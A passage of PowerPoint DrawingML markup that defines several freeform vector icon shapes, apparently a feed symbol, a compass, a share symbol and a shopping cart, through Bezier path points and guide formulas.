                  <a:gd name="T38" fmla="*/ 50 w 104"/>
                  <a:gd name="T39" fmla="*/ 85 h 105"/>
                  <a:gd name="T40" fmla="*/ 73 w 104"/>
                  <a:gd name="T41" fmla="*/ 85 h 105"/>
                  <a:gd name="T42" fmla="*/ 19 w 104"/>
                  <a:gd name="T43" fmla="*/ 31 h 105"/>
                  <a:gd name="T44" fmla="*/ 19 w 104"/>
                  <a:gd name="T45" fmla="*/ 18 h 105"/>
                  <a:gd name="T46" fmla="*/ 86 w 104"/>
                  <a:gd name="T47" fmla="*/ 85 h 105"/>
                  <a:gd name="T48" fmla="*/ 73 w 104"/>
                  <a:gd name="T49" fmla="*/ 8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4" h="105">
                    <a:moveTo>
                      <a:pt x="86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97"/>
                      <a:pt x="7" y="105"/>
                      <a:pt x="17" y="105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96" y="105"/>
                      <a:pt x="104" y="97"/>
                      <a:pt x="104" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="18"/>
                      <a:pt x="104" y="18"/>
                      <a:pt x="104" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="8"/>
                      <a:pt x="96" y="0"/>
                      <a:pt x="86" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="28" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="85"/>
                      <a:pt x="19" y="81"/>
                      <a:pt x="19" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="71"/>
                      <a:pt x="23" y="67"/>
                      <a:pt x="28" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="67"/>
                      <a:pt x="37" y="71"/>
                      <a:pt x="37" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="81"/>
                      <a:pt x="33" y="85"/>
                      <a:pt x="28" y="85"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="77"/>
                      <a:pt x="47" y="69"/>
                      <a:pt x="41" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="57"/>
                      <a:pt x="27" y="54"/>
                      <a:pt x="19" y="54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43" y="41"/>
                      <a:pt x="63" y="61"/>
                      <a:pt x="63" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="85"/>
                      <a:pt x="50" y="85"/>
                      <a:pt x="50" y="85"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="85"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="55"/>
                      <a:pt x="49" y="31"/>
                      <a:pt x="19" y="31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56" y="18"/>
                      <a:pt x="86" y="48"/>
                      <a:pt x="86" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="85"/>
                      <a:pt x="73" y="85"/>
                      <a:pt x="73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8" name="Freeform 123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB90725F-2562-4C2A-87AB-4FAC066495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84858" y="3579580"/>
                <a:ext cx="307301" cy="322959"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 41 w 96"/>
                  <a:gd name="T1" fmla="*/ 6 h 101"/>
                  <a:gd name="T2" fmla="*/ 42 w 96"/>
                  <a:gd name="T3" fmla="*/ 2 h 101"/>
                  <a:gd name="T4" fmla="*/ 36 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 101"/>
                  <a:gd name="T6" fmla="*/ 35 w 96"/>
                  <a:gd name="T7" fmla="*/ 7 h 101"/>
                  <a:gd name="T8" fmla="*/ 0 w 96"/>
                  <a:gd name="T9" fmla="*/ 54 h 101"/>
                  <a:gd name="T10" fmla="*/ 96 w 96"/>
                  <a:gd name="T11" fmla="*/ 54 h 101"/>
                  <a:gd name="T12" fmla="*/ 33 w 96"/>
                  <a:gd name="T13" fmla="*/ 4 h 101"/>
                  <a:gd name="T14" fmla="*/ 38 w 96"/>
                  <a:gd name="T15" fmla="*/ 1 h 101"/>
                  <a:gd name="T16" fmla="*/ 40 w 96"/>
                  <a:gd name="T17" fmla="*/ 5 h 101"/>
                  <a:gd name="T18" fmla="*/ 35 w 96"/>
                  <a:gd name="T19" fmla="*/ 6 h 101"/>
                  <a:gd name="T20" fmla="*/ 73 w 96"/>
                  <a:gd name="T21" fmla="*/ 79 h 101"/>
                  <a:gd name="T22" fmla="*/ 54 w 96"/>
                  <a:gd name="T23" fmla="*/ 81 h 101"/>
                  <a:gd name="T24" fmla="*/ 48 w 96"/>
                  <a:gd name="T25" fmla="*/ 90 h 101"/>
                  <a:gd name="T26" fmla="*/ 13 w 96"/>
                  <a:gd name="T27" fmla="*/ 64 h 101"/>
                  <a:gd name="T28" fmla="*/ 12 w 96"/>
                  <a:gd name="T29" fmla="*/ 58 h 101"/>
                  <a:gd name="T30" fmla="*/ 22 w 96"/>
                  <a:gd name="T31" fmla="*/ 28 h 101"/>
                  <a:gd name="T32" fmla="*/ 42 w 96"/>
                  <a:gd name="T33" fmla="*/ 26 h 101"/>
                  <a:gd name="T34" fmla="*/ 48 w 96"/>
                  <a:gd name="T35" fmla="*/ 17 h 101"/>
                  <a:gd name="T36" fmla="*/ 83 w 96"/>
                  <a:gd name="T37" fmla="*/ 43 h 101"/>
                  <a:gd name="T38" fmla="*/ 84 w 96"/>
                  <a:gd name="T39" fmla="*/ 49 h 101"/>
                  <a:gd name="T40" fmla="*/ 73 w 96"/>
                  <a:gd name="T41" fmla="*/ 79 h 101"/>
                  <a:gd name="T42" fmla="*/ 53 w 96"/>
                  <a:gd name="T43" fmla="*/ 44 h 101"/>
                  <a:gd name="T44" fmla="*/ 43 w 96"/>
                  <a:gd name="T45" fmla="*/ 32 h 101"/>
                  <a:gd name="T46" fmla="*/ 40 w 96"/>
                  <a:gd name="T47" fmla="*/ 46 h 101"/>
                  <a:gd name="T48" fmla="*/ 38 w 96"/>
                  <a:gd name="T49" fmla="*/ 49 h 101"/>
                  <a:gd name="T50" fmla="*/ 26 w 96"/>
                  <a:gd name="T51" fmla="*/ 58 h 101"/>
                  <a:gd name="T52" fmla="*/ 38 w 96"/>
                  <a:gd name="T53" fmla="*/ 59 h 101"/>
                  <a:gd name="T54" fmla="*/ 43 w 96"/>
                  <a:gd name="T55" fmla="*/ 63 h 101"/>
                  <a:gd name="T56" fmla="*/ 53 w 96"/>
                  <a:gd name="T57" fmla="*/ 75 h 101"/>
                  <a:gd name="T58" fmla="*/ 56 w 96"/>
                  <a:gd name="T59" fmla="*/ 61 h 101"/>
                  <a:gd name="T60" fmla="*/ 58 w 96"/>
                  <a:gd name="T61" fmla="*/ 58 h 101"/>
                  <a:gd name="T62" fmla="*/ 70 w 96"/>
                  <a:gd name="T63" fmla="*/ 49 h 101"/>
                  <a:gd name="T64" fmla="*/ 58 w 96"/>
                  <a:gd name="T65" fmla="*/ 48 h 101"/>
                  <a:gd name="T66" fmla="*/ 48 w 96"/>
                  <a:gd name="T67" fmla="*/ 44 h 101"/>
                  <a:gd name="T68" fmla="*/ 48 w 96"/>
                  <a:gd name="T69" fmla="*/ 44 h 101"/>
                  <a:gd name="T70" fmla="*/ 48 w 96"/>
                  <a:gd name="T71" fmla="*/ 44 h 101"/>
                  <a:gd name="T72" fmla="*/ 49 w 96"/>
                  <a:gd name="T73" fmla="*/ 44 h 101"/>
                  <a:gd name="T74" fmla="*/ 52 w 96"/>
                  <a:gd name="T75" fmla="*/ 45 h 101"/>
                  <a:gd name="T76" fmla="*/ 39 w 96"/>
                  <a:gd name="T77" fmla="*/ 57 h 101"/>
                  <a:gd name="T78" fmla="*/ 46 w 96"/>
                  <a:gd name="T79" fmla="*/ 44 h 101"/>
                  <a:gd name="T80" fmla="*/ 53 w 96"/>
                  <a:gd name="T81" fmla="*/ 62 h 101"/>
                  <a:gd name="T82" fmla="*/ 50 w 96"/>
                  <a:gd name="T83" fmla="*/ 63 h 101"/>
                  <a:gd name="T84" fmla="*/ 47 w 96"/>
                  <a:gd name="T85" fmla="*/ 63 h 101"/>
                  <a:gd name="T86" fmla="*/ 47 w 96"/>
                  <a:gd name="T87" fmla="*/ 63 h 101"/>
                  <a:gd name="T88" fmla="*/ 51 w 96"/>
                  <a:gd name="T89" fmla="*/ 57 h 101"/>
                  <a:gd name="T90" fmla="*/ 57 w 96"/>
                  <a:gd name="T91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6" h="101">
                    <a:moveTo>
                      <a:pt x="48" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="6"/>
                      <a:pt x="43" y="6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2" y="5"/>
                      <a:pt x="43" y="4"/>
                      <a:pt x="42" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="1"/>
                      <a:pt x="40" y="0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3" y="0"/>
                      <a:pt x="31" y="3"/>
                      <a:pt x="32" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="6"/>
                      <a:pt x="33" y="7"/>
                      <a:pt x="35" y="7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15" y="13"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="80"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="48" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="101"/>
                      <a:pt x="96" y="80"/>
                      <a:pt x="96" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="27"/>
                      <a:pt x="74" y="6"/>
                      <a:pt x="48" y="6"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="33" y="4"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="3"/>
                      <a:pt x="35" y="2"/>
                      <a:pt x="37" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="1"/>
                      <a:pt x="37" y="1"/>
                      <a:pt x="38" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="1"/>
                      <a:pt x="41" y="2"/>
                      <a:pt x="41" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="4"/>
                      <a:pt x="41" y="4"/>
                      <a:pt x="40" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="4"/>
                      <a:pt x="38" y="4"/>
                      <a:pt x="37" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="5"/>
                      <a:pt x="36" y="5"/>
                      <a:pt x="35" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="6"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33" y="4"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="84"/>
                      <a:pt x="64" y="87"/>
                      <a:pt x="58" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="81"/>
                      <a:pt x="54" y="81"/>
                      <a:pt x="54" y="81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1" y="90"/>
                      <a:pt x="50" y="90"/>
                      <a:pt x="48" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="90"/>
                      <a:pt x="29" y="86"/>
                      <a:pt x="22" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="75"/>
                      <a:pt x="15" y="70"/>
                      <a:pt x="13" y="64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2" y="57"/>
                      <a:pt x="12" y="55"/>
                      <a:pt x="12" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="44"/>
                      <a:pt x="15" y="35"/>
                      <a:pt x="22" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="24"/>
                      <a:pt x="32" y="21"/>
                      <a:pt x="38" y="19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5" y="18"/>
                      <a:pt x="46" y="17"/>
                      <a:pt x="48" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="67" y="21"/>
                      <a:pt x="73" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="32"/>
                      <a:pt x="81" y="38"/>
                      <a:pt x="83" y="43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84" y="49"/>
                      <a:pt x="84" y="49"/>
                      <a:pt x="84" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="50"/>
                      <a:pt x="84" y="52"/>
                      <a:pt x="84" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="63"/>
                      <a:pt x="80" y="72"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="44"/>
                      <a:pt x="53" y="44"/>
                      <a:pt x="53" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="43"/>
                      <a:pt x="50" y="43"/>
                      <a:pt x="48" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="32"/>
                      <a:pt x="43" y="32"/>
                      <a:pt x="43" y="32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2" y="44"/>
                      <a:pt x="40" y="45"/>
                      <a:pt x="40" y="46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8" y="49"/>
                      <a:pt x="38" y="49"/>
                      <a:pt x="38" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="50"/>
                      <a:pt x="37" y="52"/>
                      <a:pt x="37" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="58"/>
                      <a:pt x="26" y="58"/>
                      <a:pt x="26" y="58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38" y="59"/>
                      <a:pt x="38" y="59"/>
                      <a:pt x="38" y="59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44" y="64"/>
                      <a:pt x="46" y="65"/>
                      <a:pt x="47" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="75"/>
                      <a:pt x="53" y="75"/>
                      <a:pt x="53" y="75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4" y="63"/>
                      <a:pt x="55" y="62"/>
                      <a:pt x="56" y="61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9" y="57"/>
                      <a:pt x="59" y="56"/>
                      <a:pt x="59" y="54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8" y="49"/>
                      <a:pt x="58" y="49"/>
                      <a:pt x="58" y="48"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="73" y="29"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="48" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="44"/>
                      <a:pt x="48" y="44"/>
                      <a:pt x="48" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="44"/>
                      <a:pt x="48" y="44"/>
                      <a:pt x="48" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="44"/>
                      <a:pt x="47" y="44"/>
                      <a:pt x="48" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48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49" y="44"/>
                      <a:pt x="49" y="44"/>
                      <a:pt x="49" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="44"/>
                      <a:pt x="51" y="44"/>
                      <a:pt x="52" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="50"/>
                      <a:pt x="45" y="50"/>
                      <a:pt x="45" y="50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9" y="57"/>
                      <a:pt x="39" y="56"/>
                      <a:pt x="39" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="50"/>
                      <a:pt x="41" y="45"/>
                      <a:pt x="46" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="53" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="62"/>
                      <a:pt x="53" y="62"/>
                      <a:pt x="53" y="62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2" y="62"/>
                      <a:pt x="51" y="63"/>
                      <a:pt x="50" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="63"/>
                      <a:pt x="49" y="63"/>
                      <a:pt x="48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7" y="63"/>
                      <a:pt x="47" y="63"/>
                      <a:pt x="47" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="63"/>
                      <a:pt x="45" y="63"/>
                      <a:pt x="44" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="57"/>
                      <a:pt x="51" y="57"/>
                      <a:pt x="51" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="50"/>
                      <a:pt x="57" y="50"/>
                      <a:pt x="57" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="50"/>
                      <a:pt x="57" y="51"/>
                      <a:pt x="57" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="56"/>
                      <a:pt x="56" y="60"/>
                      <a:pt x="53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89" name="Freeform 124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEB24EE-A193-4AD8-9E36-999DEB6936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504" y="2679209"/>
                <a:ext cx="340575" cy="340575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 90 w 107"/>
                  <a:gd name="T1" fmla="*/ 74 h 107"/>
                  <a:gd name="T2" fmla="*/ 78 w 107"/>
                  <a:gd name="T3" fmla="*/ 79 h 107"/>
                  <a:gd name="T4" fmla="*/ 33 w 107"/>
                  <a:gd name="T5" fmla="*/ 56 h 107"/>
                  <a:gd name="T6" fmla="*/ 34 w 107"/>
                  <a:gd name="T7" fmla="*/ 54 h 107"/>
                  <a:gd name="T8" fmla="*/ 33 w 107"/>
                  <a:gd name="T9" fmla="*/ 51 h 107"/>
                  <a:gd name="T10" fmla="*/ 78 w 107"/>
                  <a:gd name="T11" fmla="*/ 29 h 107"/>
                  <a:gd name="T12" fmla="*/ 90 w 107"/>
                  <a:gd name="T13" fmla="*/ 34 h 107"/>
                  <a:gd name="T14" fmla="*/ 107 w 107"/>
                  <a:gd name="T15" fmla="*/ 17 h 107"/>
                  <a:gd name="T16" fmla="*/ 90 w 107"/>
                  <a:gd name="T17" fmla="*/ 0 h 107"/>
                  <a:gd name="T18" fmla="*/ 74 w 107"/>
                  <a:gd name="T19" fmla="*/ 17 h 107"/>
                  <a:gd name="T20" fmla="*/ 74 w 107"/>
                  <a:gd name="T21" fmla="*/ 20 h 107"/>
                  <a:gd name="T22" fmla="*/ 29 w 107"/>
                  <a:gd name="T23" fmla="*/ 42 h 107"/>
                  <a:gd name="T24" fmla="*/ 17 w 107"/>
                  <a:gd name="T25" fmla="*/ 37 h 107"/>
                  <a:gd name="T26" fmla="*/ 0 w 107"/>
                  <a:gd name="T27" fmla="*/ 54 h 107"/>
                  <a:gd name="T28" fmla="*/ 17 w 107"/>
                  <a:gd name="T29" fmla="*/ 70 h 107"/>
                  <a:gd name="T30" fmla="*/ 29 w 107"/>
                  <a:gd name="T31" fmla="*/ 65 h 107"/>
                  <a:gd name="T32" fmla="*/ 74 w 107"/>
                  <a:gd name="T33" fmla="*/ 88 h 107"/>
                  <a:gd name="T34" fmla="*/ 74 w 107"/>
                  <a:gd name="T35" fmla="*/ 90 h 107"/>
                  <a:gd name="T36" fmla="*/ 90 w 107"/>
                  <a:gd name="T37" fmla="*/ 107 h 107"/>
                  <a:gd name="T38" fmla="*/ 107 w 107"/>
                  <a:gd name="T39" fmla="*/ 90 h 107"/>
                  <a:gd name="T40" fmla="*/ 90 w 107"/>
                  <a:gd name="T41" fmla="*/ 7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7" h="107">
                    <a:moveTo>
                      <a:pt x="90" y="74"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="74"/>
                      <a:pt x="81" y="76"/>
                      <a:pt x="78" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="56"/>
                      <a:pt x="33" y="56"/>
                      <a:pt x="33" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="56"/>
                      <a:pt x="34" y="55"/>
                      <a:pt x="34" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="53"/>
                      <a:pt x="34" y="52"/>
                      <a:pt x="33" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="29"/>
                      <a:pt x="78" y="29"/>
                      <a:pt x="78" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="32"/>
                      <a:pt x="86" y="34"/>
                      <a:pt x="90" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="34"/>
                      <a:pt x="107" y="26"/>
                      <a:pt x="107" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="8"/>
                      <a:pt x="100" y="0"/>
                      <a:pt x="90" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="0"/>
                      <a:pt x="74" y="8"/>
                      <a:pt x="74" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="18"/>
                      <a:pt x="74" y="19"/>
                      <a:pt x="74" y="20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6" y="39"/>
                      <a:pt x="22" y="37"/>
                      <a:pt x="17" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="37"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="63"/>
                      <a:pt x="8" y="70"/>
                      <a:pt x="17" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="70"/>
                      <a:pt x="26" y="68"/>
                      <a:pt x="29" y="65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74" y="89"/>
                      <a:pt x="74" y="90"/>
                      <a:pt x="74" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="100"/>
                      <a:pt x="81" y="107"/>
                      <a:pt x="90" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="107"/>
                      <a:pt x="107" y="100"/>
                      <a:pt x="107" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="81"/>
                      <a:pt x="100" y="74"/>
                      <a:pt x="90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0" name="Freeform 125">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EA39A1-3AA1-4F7C-8388-5F3E4E92A6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5071" y="1874748"/>
                <a:ext cx="324917" cy="352319"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 102"/>
                  <a:gd name="T1" fmla="*/ 100 h 110"/>
                  <a:gd name="T2" fmla="*/ 24 w 102"/>
                  <a:gd name="T3" fmla="*/ 110 h 110"/>
                  <a:gd name="T4" fmla="*/ 34 w 102"/>
                  <a:gd name="T5" fmla="*/ 100 h 110"/>
                  <a:gd name="T6" fmla="*/ 34 w 102"/>
                  <a:gd name="T7" fmla="*/ 100 h 110"/>
                  <a:gd name="T8" fmla="*/ 24 w 102"/>
                  <a:gd name="T9" fmla="*/ 89 h 110"/>
                  <a:gd name="T10" fmla="*/ 13 w 102"/>
                  <a:gd name="T11" fmla="*/ 100 h 110"/>
                  <a:gd name="T12" fmla="*/ 82 w 102"/>
                  <a:gd name="T13" fmla="*/ 100 h 110"/>
                  <a:gd name="T14" fmla="*/ 92 w 102"/>
                  <a:gd name="T15" fmla="*/ 110 h 110"/>
                  <a:gd name="T16" fmla="*/ 102 w 102"/>
                  <a:gd name="T17" fmla="*/ 100 h 110"/>
                  <a:gd name="T18" fmla="*/ 102 w 102"/>
                  <a:gd name="T19" fmla="*/ 100 h 110"/>
                  <a:gd name="T20" fmla="*/ 92 w 102"/>
                  <a:gd name="T21" fmla="*/ 89 h 110"/>
                  <a:gd name="T22" fmla="*/ 82 w 102"/>
                  <a:gd name="T23" fmla="*/ 100 h 110"/>
                  <a:gd name="T24" fmla="*/ 102 w 102"/>
                  <a:gd name="T25" fmla="*/ 55 h 110"/>
                  <a:gd name="T26" fmla="*/ 102 w 102"/>
                  <a:gd name="T27" fmla="*/ 14 h 110"/>
                  <a:gd name="T28" fmla="*/ 13 w 102"/>
                  <a:gd name="T29" fmla="*/ 14 h 110"/>
                  <a:gd name="T30" fmla="*/ 0 w 102"/>
                  <a:gd name="T31" fmla="*/ 0 h 110"/>
                  <a:gd name="T32" fmla="*/ 0 w 102"/>
                  <a:gd name="T33" fmla="*/ 7 h 110"/>
                  <a:gd name="T34" fmla="*/ 7 w 102"/>
                  <a:gd name="T35" fmla="*/ 14 h 110"/>
                  <a:gd name="T36" fmla="*/ 12 w 102"/>
                  <a:gd name="T37" fmla="*/ 58 h 110"/>
                  <a:gd name="T38" fmla="*/ 7 w 102"/>
                  <a:gd name="T39" fmla="*/ 69 h 110"/>
                  <a:gd name="T40" fmla="*/ 20 w 102"/>
                  <a:gd name="T41" fmla="*/ 82 h 110"/>
                  <a:gd name="T42" fmla="*/ 102 w 102"/>
                  <a:gd name="T43" fmla="*/ 82 h 110"/>
                  <a:gd name="T44" fmla="*/ 102 w 102"/>
                  <a:gd name="T45" fmla="*/ 76 h 110"/>
                  <a:gd name="T46" fmla="*/ 20 w 102"/>
                  <a:gd name="T47" fmla="*/ 76 h 110"/>
                  <a:gd name="T48" fmla="*/ 13 w 102"/>
                  <a:gd name="T49" fmla="*/ 69 h 110"/>
                  <a:gd name="T50" fmla="*/ 13 w 102"/>
                  <a:gd name="T51" fmla="*/ 69 h 110"/>
                  <a:gd name="T52" fmla="*/ 102 w 102"/>
                  <a:gd name="T53" fmla="*/ 55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2" h="110">
                    <a:moveTo>
                      <a:pt x="13" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="105"/>
                      <a:pt x="18" y="110"/>
                      <a:pt x="24" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="110"/>
                      <a:pt x="34" y="105"/>
                      <a:pt x="34" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="100"/>
                      <a:pt x="34" y="100"/>
                      <a:pt x="34" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="94"/>
                      <a:pt x="29" y="89"/>
                      <a:pt x="24" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="89"/>
                      <a:pt x="13" y="94"/>
                      <a:pt x="13" y="100"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="82" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="105"/>
                      <a:pt x="86" y="110"/>
                      <a:pt x="92" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="110"/>
                      <a:pt x="102" y="105"/>
                      <a:pt x="102" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="100"/>
                      <a:pt x="102" y="100"/>
                      <a:pt x="102" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="94"/>
                      <a:pt x="98" y="89"/>
                      <a:pt x="92" y="89"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="89"/>
                      <a:pt x="82" y="94"/>
                      <a:pt x="82" y="100"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="102" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="14"/>
                      <a:pt x="102" y="14"/>
                      <a:pt x="10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6"/>
                      <a:pt x="7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7" y="10"/>
                      <a:pt x="7" y="1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9" y="61"/>
                      <a:pt x="7" y="64"/>
                      <a:pt x="7" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="76"/>
                      <a:pt x="13" y="82"/>
                      <a:pt x="20" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="82"/>
                      <a:pt x="102" y="82"/>
                      <a:pt x="102" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="76"/>
                      <a:pt x="102" y="76"/>
                      <a:pt x="102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16" y="76"/>
                      <a:pt x="13" y="73"/>
